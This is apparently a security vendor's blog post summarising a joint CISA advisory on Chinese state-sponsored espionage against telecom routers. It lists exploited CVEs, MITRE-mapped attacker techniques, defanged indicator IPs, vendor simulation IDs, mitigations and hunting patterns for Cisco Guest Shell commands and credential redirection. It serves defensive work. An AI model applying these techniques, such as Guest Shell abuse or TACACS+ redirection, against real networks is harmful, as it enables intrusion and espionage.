Countering Chinese State-Sponsored Espionage Campaigns: SafeBreach Coverage for CISA Advisory AA25-239A

In August 2025, a joint Cybersecurity Advisory (CSA) was issued by CISA, NSA, FBI, and allied cybersecurity agencies across the Five Eyes, EU, and partner nations. This advisory details a long-term espionage campaign by People’s Republic of China (PRC) state-sponsored actors—linked to companies supporting the Ministry of State Security (MSS) and People’s Liberation Army (PLA).

The actors—tracked in industry reporting as Salt Typhoon, OPERATOR PANDA, RedMike, UNC5807, and GhostEmperor—have systematically compromised telecommunications, government, transportation, lodging, and military networks worldwide. Their operations focus on exploiting backbone routers and trusted interconnections, modifying infrastructure for long-term access, and exfiltrating data to power global surveillance and espionage systems.

Understanding the PRC Espionage Threat

Chinese state-sponsored actors have been conducting global campaigns since at least 2021, leveraging both state-linked front companies and compromised network devices. 

Their primary goals are to:

• Maintain persistence across routers and service-provider infrastructure.
• Exfiltrate telecommunications data to track communications and movements.
• Pivot laterally into customer and enterprise networks via trusted connections.

This activity emphasizes network infrastructure exploitation, making telecommunications providers and backbone routers especially critical targets.

Recent PRC-sponsored APTs we have covered include APT40 (Kryptonite Panda) and Volt Typhoon (we just covered an update on Volt Typhoon on our podcast this month; check it out on Spotify and Apple Podcasts).

Key Tactics, Techniques, and Procedures (TTPs)

Initial Access

Actors relied heavily on known CVEs in network edge devices rather than zero-days, including:

• Ivanti Connect Secure (CVE-2024-21887) – command injection; (Exploitation for Client Execution [T1203])
• Palo Alto GlobalProtect (CVE-2024-3400) – unauthenticated RCE; (Exploitation of Public-Facing Application [T1190])
• Cisco IOS XE (CVE-2023-20198, CVE-2023-20273) – authentication bypass + privilege escalation; (Exploitation of Remote Services [T1133]).
• Cisco Smart Install (CVE-2018-0171) – RCE; (Exploitation of Remote Services [T1133]).

They also used:

• VPS infrastructure and compromised intermediate routers to anonymize and redirect activity (Use of Proxy Services [T1090]).
• Trusted provider-to-provider and provider-to-customer links for lateral pivoting (Exploitation of Trust Relationships [T1199]).

Persistence

Once inside, actors modified systems to maintain long-term access:

• ACL modifications to whitelist actor-controlled IPs (Modify System Configuration [T1601]).
• Enabling SSH and HTTP(S) services on high, non-standard ports (Ingress Tool Transfer / Non-Standard Port [T1571]).
• Abuse of Cisco Guest Shell containers to stage tools, execute scripts, and evade monitoring (Container Administration Command [T1609]).

Lateral Movement & Collection

After persistence, attackers shifted focus to expanding control and data collection:

• Packet capture (PCAP) to harvest TACACS+/RADIUS authentication traffic (Network Sniffing [T1040]).
• Modification of TACACS+ server configs to redirect credentials (Modify Authentication Process [T1556]).
• Enumeration of router configs, BGP routes, and subscriber records (Network Device Configuration Dump [T1602]).

Exfiltration

Data was exfiltrated using methods designed to blend into legitimate traffic:

• GRE/IPsec tunnels to conceal C2 and exfiltration (Exfiltration Over Unencrypted/Encrypted Non-C2 Channel [T1048]).
• Deployment of custom SFTP clients (cmd1, cmd3, new2, sft) to move data off compromised routers (Exfiltration Over Alternative Protocol [T1048.003]).

Indicators of Compromise (IOCs)

The advisory provides extensive IOCs tied to Chinese state-sponsored activity. These can be aligned to MITRE ATT&CK techniques for clarity:

• APT-associated IPs active between 2021–2025 (e.g., 167.88.173[.]252, 193.239.86[.]132, 45.61.165[.]157)
  → Command and Control over IPv4 [T1071.001]
• YARA rules for detecting custom SFTP clients (cmd1, cmd3, new2, sft)
  → Exfiltration Over Alternative Protocol [T1048.003]
• Snort rule for CVE-2023-20198 exploitation attempts (Cisco IOS XE auth bypass)
  → Exploitation of Remote Services [T1133]
• ACL modifications whitelisting malicious IPs (observed as IOC patterns)
  → Modify System Configuration [T1601]
• Suspicious TACACS+/RADIUS redirection traffic
  → Modify Authentication Process [T1556]
• Unusual GRE/IPsec tunneling patterns tied to exfiltration
  → Exfiltration Over Unencrypted/Encrypted Non-C2 Channel [T1048]

SafeBreach Coverage and Playbook Updates

Existing Behavioral Coverage

• Credential theft and brute-force over RDP, HTTP/S, SSH, and SNMP (Simulations 192, 258, 173, 1325)
• Remote exploitation of Ivanti Connect Secure (Sim 9482)
• Remote exploitation of Palo Alto PAN-OS command injection (Sim 9992)
• Agentless lateral movement techniques: RDP (6473), SSH scanning (8021), WinRM/Remote Registry (5670–5674)
• Active Directory reconnaissance via tools like schtasks, ntdsutil, PowerShell (7223 and related)
• Covert data exfiltration using TCP, UDP, HTTP GET/POST, SNMP (100, 101, 10481, 110, 121)
• Creation of malicious services and scheduled tasks (2294, 10439, etc)

New Simulation Coverage

• Simulation #11107 – Write cmd1 (18e4f4) trojan to disk
• Simulation #11108 – Pre-execution phase of cmd1 (18e4f4) trojan (Linux)
• Simulation #11109 – Transfer of cmd1 (18e4f4) ransomware over HTTP/S
• Simulation #11110 – Transfer of cmd1 (18e4f4) trojan over HTTP/S
• Simulation #11111 – Email cmd1 (18e4f4) trojan as compressed attachment
• Simulation #11112 – Email cmd1 (18e4f4) trojan as compressed attachment

What You Should Do Now

SafeBreach customers can validate their defenses against this campaign using two methods:

Method 1 – Navigate to the “SafeBreach Scenarios” page and select the scenario.

Method 2 – Run the Known Attack Series report to execute all mapped simulations.

Mitigation Strategies

The CISA advisory outlines a series of defensive measures organizations should take to counter PRC state-sponsored actors:

1. Baseline and Audit Router Configurations
   • Regularly pull all running configurations from networking equipment and compare against the latest authorized baselines.
   • Review ACLs, remote access configs, and transport protocols for unauthorized changes.
   • Validate routing tables to ensure no unexpected or malicious routes have been added.
     
2. Enforce Secure Management Protocols
   • Require SNMPv3 with appropriate authentication and privacy configurations.
   • Eliminate weak/default community strings and restrict SNMP writes to trusted devices only.
   • Disable unused services, ports, and legacy protocols such as Telnet and unencrypted HTTP.
     
3. Harden Authentication & Authorization
   • Verify the authenticity and permission levels of all local accounts.
   • Watch for abnormal TACACS+/RADIUS server changes or redirection attempts.
     
4. Audit Containerized Services
   • If using Cisco Guest Shell (IOS XE or NX-OS), monitor with a combination of syslog, AAA accounting, container logs, and off-box telemetry.
   • Hunt for suspicious Guest Shell commands such as guestshell enable, guestshell run bash, chvrf, or dohost.
   • Disable Guest Shell entirely if not operationally required.
     
5. Validate Firmware and Images
   • Compare firmware and image hashes against vendor-provided values to detect tampering.
   • Enable signed image enforcement and configuration integrity features where supported.

SafeBreach Recommendation (in addition to CISA guidance):

• Prioritize patching for critical vulnerabilities often exploited by PRC actors, including:
  • CVE-2024-21887 (Ivanti Connect Secure)
  • CVE-2024-3400 (Palo Alto GlobalProtect)
  • CVE-2023-20198 / CVE-2023-20273 (Cisco IOS XE)
  • CVE-2018-0171 (Cisco Smart Install)

Proactive Threat Monitoring

Organizations should actively hunt for signs of malicious activity across their environments:

1. Monitor for Configuration Manipulation
   • Alert on unauthorized ACL modifications, new tunnels, or routing changes.
   • Verify any PCAP commands on network equipment are legitimate and expected.
     
2. Watch for Service Abuse
   • Look for management services enabled on non-standard ports (e.g., SSH on 22×22/xxx22 patterns, HTTPS on 18xxx, IOS XR sshd_operns on TCP/57722).
   • Monitor for FTP/TFTP traffic to unauthorized destinations, especially if preceded by PCAP capture commands.
     
3. Detect Suspicious Authentication Behavior
   • Flag TACACS+ traffic to non-approved IPs or flows leaving the management VRF.
   • Correlate TACACS+/AAA changes with potential credential harvesting attempts.
     
4. Hunt for Guest Shell Abuse
   • Track lifecycle events: guestshell enable, guestshell run, guestshell disable/destroy.
   • Audit container file systems and command histories where possible.
     
5. Monitor Logs and Integrity
   • Watch for attempts to clear, disable, or redirect logging.
   • Validate that logs are flowing to centralized collectors via encrypted channels.

Stay Ahead with SafeBreach

SafeBreach enables organizations to simulate the full range of Chinese state-sponsored tactics outlined in CISA Advisory AA25-239. By validating both behavioral coverage and IOC-triggered simulations, defenders can assess detection, close gaps, and prioritize remediation.

With SafeBreach Propagate, customers can further evaluate how attackers could pivot through their environments—mapping attack paths, visualizing lateral movement, and addressing exposures to critical assets.

Run the latest SafeBreach simulations today to ensure your defenses stand ready against PRC espionage campaigns.